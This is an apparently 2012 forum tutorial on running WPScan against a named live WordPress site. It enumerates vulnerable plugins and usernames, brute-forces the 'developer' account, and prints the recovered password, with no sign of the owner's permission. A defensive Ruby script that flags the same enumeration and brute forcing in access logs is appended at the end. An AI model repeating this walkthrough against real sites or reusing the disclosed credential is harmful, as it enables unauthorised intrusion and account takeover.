RieqyNS13 Moderator
Posts: 379 Join date: 2011-01-16 Age: 26 Location: chmod 0655 GetConfig.SQL
Subject: Enumerate a WordPress site with wpscan.rb Sun Dec 30, 2012 11:15 pm
Wpscan for Linux

No need for a lot of talk :dead Most DC members probably already know this, so those who already know can just leave. I only want to share it for those who don't know yet :dead

1. Open wpscan.rb ( /pentest/web/wpscan )
2. Type wpscan.rb, then press Enter. It usually asks whether you want to update or not; if not, type n, and if you want to update, type y.
* If you choose y, then once the update has finished, an error like this usually appears when you open wpscan.rb

Code:
root@bt:/pentest/web/wpscan# ./wpscan.rb -h
[ERROR] Install missing ruby gem. Please see README file or http://code.google.com/p/wpscan/
#<LoadError: no such file to load -- nokogiri>

The solution is already in the error message -_- :

Code:
gem install --user-install nokogiri

Code:
root@bt:/pentest/web/wpscan# gem install --user-install nokogiri
WARNING: You don't have /root/.gem/ruby/1.9.2/bin in your PATH,
gem executables will not run.
Building native extensions. This could take a while...
Successfully installed nokogiri-1.5.2
1 gem installed
Installing ri documentation for nokogiri-1.5.2...
Installing RDoc documentation for nokogiri-1.5.2...

3. Type ./wpscan.rb or ./wpscan.rb --help

Code:
____________________________________________________
 __          _______   _____
 \ \        / /  __ \ / ____|
  \ \  /\  / /| |__) | (___   ___  __ _ _ __
   \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
    \  /\  /  | |     ____) | (__| (_| | | | |
     \/  \/   |_|    |_____/ \___|\__,_|_| |_| v1.1r425
WordPress Security Scanner by the WPScan Team
Sponsored by the RandomStorm Open Source Initiative
_____________________________________________________
[WARNING] The SVN repository is DEPRECATED, use the GIT one - http://github.com/wpscanteam/wpscan
Help :
Some values are settable in conf/browser.conf.json :
  user-agent, proxy, threads, cache timeout and request timeout
--update   Update to the latest revision
--url | -u <target url>   The WordPress URL/domain to scan.
--force | -f   Forces WPScan to not check if the remote site is running WordPress.
--enumerate | -e [option(s)]   Enumeration.
  option :
    u          usernames from id 1 to 10
    u[10-20]   usernames from id 10 to 20 (you must write [] chars)
    p          plugins
    p!         only vulnerable plugins
    t          timthumbs
  Multiple values are allowed : '-e tp' will enumerate timthumbs and plugins
  If no option is supplied, the default is 'tup!'
--follow-redirection   If the target url has a redirection, it will be followed without asking if you wanted to do so or not
--wp-content-dir <wp content dir>   WPScan try to find the content directory (ie wp-content) by scanning the index page, however you can specified it. Subdirectories are allowed
--wp-plugins-dir <wp plugins dir>   Same thing than --wp-content-dir but for the plugins directory. If not supplied, WPScan will use wp-content-dir/plugins. Subdirectories are allowed
--proxy   Supply a proxy in the format host:port (will override the one from conf/browser.conf.json)
--wordlist | -w <wordlist>   Supply a wordlist for the password bruter and do the brute.
--threads | -t <number of threads>   The number of threads to use when multi-threading requests. (will override the value from conf/browser.conf.json)
--username | -U <username>   Only brute force the supplied username.
--help | -h   This help screen.
--verbose | -v   Verbose output.

From here you can continue on your own, right? :ngamuk:nothing If anyone still doesn't know, fine, I'll give the tutorial as well. For those who already know, why are you even here :ngakak

4. Enter the URL and choose the other options. For example, I want to look at the vulnerable plugins:

Code:
./wpscan.rb --url www.productbestbuy.com --enumerate p!

Code:
root@bt:/pentest/web/wpscan# ./wpscan.rb --url www.productbestbuy.com --enumerate p!
____________________________________________________
 __          _______   _____
 \ \        / /  __ \ / ____|
  \ \  /\  / /| |__) | (___   ___  __ _ _ __
   \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
    \  /\  /  | |     ____) | (__| (_| | | | |
     \/  \/   |_|    |_____/ \___|\__,_|_| |_| v1.1r425
WordPress Security Scanner by the WPScan Team
Sponsored by the RandomStorm Open Source Initiative
_____________________________________________________
[WARNING] The SVN repository is DEPRECATED, use the GIT one - http://github.com/wpscanteam/wpscan
| URL: http://www.productbestbuy.com
| Started on Sun Dec 30 21:54:53 2012
[!] The WordPress theme in use is easel v3.0.7
[!] The WordPress 'http://www.productbestbuy.com/readme.html' file exists
[!] Full Path Disclosure (FPD) in 'http://www.productbestbuy.com/wp-includes/rss-functions.php'
[!] WordPress version 3.4.1 identified from meta generator
[+] Enumerating plugins from passive detection ...
2 found :
 | Name: amazon-link
 | Location: http://www.productbestbuy.com/$wp-plugins$/amazon-link/
 | Name: jetpack
 | Location: http://www.productbestbuy.com/$wp-plugins$/jetpack/
 |
 | [!] jetpack plugin SQL Injection Vulnerability
 | * Reference: http://www.exploit-db.com/exploits/18126/
[+] Enumerating installed plugins (only vulnerable ones) ...
Checking for 253 total plugins... 100% complete.
[+] We found 1 plugins:
 | Name: jetpack
 | Location: http://www.productbestbuy.com/wp-content/plugins/jetpack/
 | Directory listing enabled? Yes.
 |
 | [!] jetpack plugin SQL Injection Vulnerability
 | * Reference: http://www.exploit-db.com/exploits/18126/
[+] Finished at Sun Dec 30 21:56:44 2012

There you go, it found 1 vulnerable plugin, and it even already gives the exploit for it :tepokjidat

5. Now let me try to find the usernames:

Code:
./wpscan.rb --url www.productbestbuy.com --enumerate u

Code:
./wpscan.rb --url www.productbestbuy.com --enumerate u
____________________________________________________
 __          _______   _____
 \ \        / /  __ \ / ____|
  \ \  /\  / /| |__) | (___   ___  __ _ _ __
   \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
    \  /\  /  | |     ____) | (__| (_| | | | |
     \/  \/   |_|    |_____/ \___|\__,_|_| |_| v1.1r425
WordPress Security Scanner by the WPScan Team
Sponsored by the RandomStorm Open Source Initiative
_____________________________________________________
[WARNING] The SVN repository is DEPRECATED, use the GIT one - http://github.com/wpscanteam/wpscan
| URL: http://www.productbestbuy.com
| Started on Sun Dec 30 22:22:31 2012
[!] The WordPress theme in use is easel v3.0.7
[!] The WordPress 'http://www.productbestbuy.com/readme.html' file exists
[!] Full Path Disclosure (FPD) in 'http://www.productbestbuy.com/wp-includes/rss-functions.php'
[!] WordPress version 3.4.1 identified from meta generator
[+] Enumerating plugins from passive detection ...
2 found :
 | Name: amazon-link
 | Location: http://www.productbestbuy.com/$wp-plugins$/amazon-link/
 | Name: jetpack
 | Location: http://www.productbestbuy.com/$wp-plugins$/jetpack/
 |
 | [!] jetpack plugin SQL Injection Vulnerability
 | * Reference: http://www.exploit-db.com/exploits/18126/
[+] Enumerating usernames ...
We found the following 2 username/s :
admin
developer

There are 2 users, admin and developer. The new version of wpscan is odd: I was only looking for usernames, yet the plugins get scanned as well :stress (just a waste of time)

6. Now to find the password using brute force :kartumerah, which means having to prepare a huge wordlist.lst :prustasi. My wordlist is located at /root/Desktop/wordlist.lst

Code:
./wpscan.rb --url www.productbestbuy.com --username developer --wordlist /root/Desktop/wordlist.lst

Code:
./wpscan.rb --url www.productbestbuy.com --username developer --wordlist /root/Desktop/wordlist.lst
____________________________________________________
 __          _______   _____
 \ \        / /  __ \ / ____|
  \ \  /\  / /| |__) | (___   ___  __ _ _ __
   \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
    \  /\  /  | |     ____) | (__| (_| | | | |
     \/  \/   |_|    |_____/ \___|\__,_|_| |_| v1.1r425
WordPress Security Scanner by the WPScan Team
Sponsored by the RandomStorm Open Source Initiative
_____________________________________________________
[WARNING] The SVN repository is DEPRECATED, use the GIT one - http://github.com/wpscanteam/wpscan
| URL: http://www.productbestbuy.com
| Started on Sun Dec 30 22:36:41 2012
[!] The WordPress theme in use is easel v3.0.7
[!] The WordPress 'http://www.productbestbuy.com/readme.html' file exists
[!] Full Path Disclosure (FPD) in 'http://www.productbestbuy.com/wp-includes/rss-functions.php'
[!] WordPress version 3.4.1 identified from meta generator
[+] Enumerating plugins from passive detection ...
2 found :
 | Name: amazon-link
 | Location: http://www.productbestbuy.com/$wp-plugins$/amazon-link/
 | Name: jetpack
 | Location: http://www.productbestbuy.com/$wp-plugins$/jetpack/
 |
 | [!] jetpack plugin SQL Injection Vulnerability
 | * Reference: http://www.exploit-db.com/exploits/18126/
[+] Starting the password brute forcer
Brute forcing user 'developer' with 12 passwords... 58% complete.
[SUCCESS] Username : developer Password : cisadane123456
[+] Finished at Sun Dec 30 22:38:18 2012

Found it.

Code:
Username : developer Password : cisadane123456

Author: RieqyNS13
wpscan developer: ethicalhacke3r

According to the developer, wpscan.rb does not support Windows even if Ruby is installed (from experience), so try using cygwin instead :ngakak
To learn more, just look at the README -_-

Code:
https://github.com/wpscanteam/wpscan/blob/master/README
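
For whoever runs the scanned site, the username enumeration in step 5 and the password brute forcing in step 6 leave a recognizable trail in the web server's access log. The Ruby script below is an added example, not part of the original post or of WPScan; it assumes the enumeration appears as GET requests to /?author=N and the brute forcer as POSTs to /wp-login.php, and the log lines, IP addresses and thresholds are constructed for illustration.

```ruby
require 'time'
LINE_RE = %r{\A(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) }

# Parse one combined-log-format line into a hash, or nil if it does not match.
def parse(line)
  m = LINE_RE.match(line) or return nil
  { ip: m[1], time: Time.strptime(m[2], '%d/%b/%Y:%H:%M:%S %z'),
    method: m[3], path: m[4], status: m[5].to_i }
end

# Returns { client_ip => [alerts] }; thresholds are assumptions to tune per site.
def detect(log, min_author_ids: 5, min_login_posts: 10, window: 60)
  author_ids = Hash.new { |h, k| h[k] = [] }
  login_times = Hash.new { |h, k| h[k] = [] }
  log.each_line do |line|
    e = parse(line.strip) or next
    if e[:method] == 'GET' && (id = e[:path][/[?&]author=(\d+)/, 1])
      author_ids[e[:ip]] << id.to_i          # author-archive probe for one user id
    elsif e[:method] == 'POST' && e[:path].start_with?('/wp-login.php')
      login_times[e[:ip]] << e[:time]        # one login attempt
    end
  end
  alerts = Hash.new { |h, k| h[k] = [] }
  author_ids.each { |ip, ids| alerts[ip] << :user_enumeration if ids.uniq.size >= min_author_ids }
  login_times.each do |ip, times|
    times.sort!
    burst = times.each_index.any? do |i|     # min_login_posts attempts within `window` seconds
      j = i + min_login_posts - 1
      j < times.size && times[j] - times[i] <= window
    end
    alerts[ip] << :login_brute_force if burst
  end
  alerts
end

# Constructed sample traffic (documentation IP ranges), not taken from the post.
def sample_log
  t = Time.utc(2012, 12, 30, 22, 0, 0)
  fmt = lambda do |ip, at, req, st|
    %(#{ip} - - [#{at.strftime('%d/%b/%Y:%H:%M:%S %z')}] "#{req} HTTP/1.1" #{st} 0 "-" "constructed")
  end
  lines = (1..10).map { |i| fmt.call('203.0.113.7', t + i, "GET /?author=#{i}", 301) }
  lines += (0...12).map { |i| fmt.call('203.0.113.7', t + 60 + 2 * i, 'POST /wp-login.php', 200) }
  lines << fmt.call('198.51.100.20', t + 5, 'GET /?author=1', 301)
  lines += (0...3).map { |i| fmt.call('198.51.100.20', t + 100 + 300 * i, 'POST /wp-login.php', 302) }
  lines.join("\n")
end

detect(sample_log).each { |ip, found| puts "#{ip}: #{found.join(', ')}" }
```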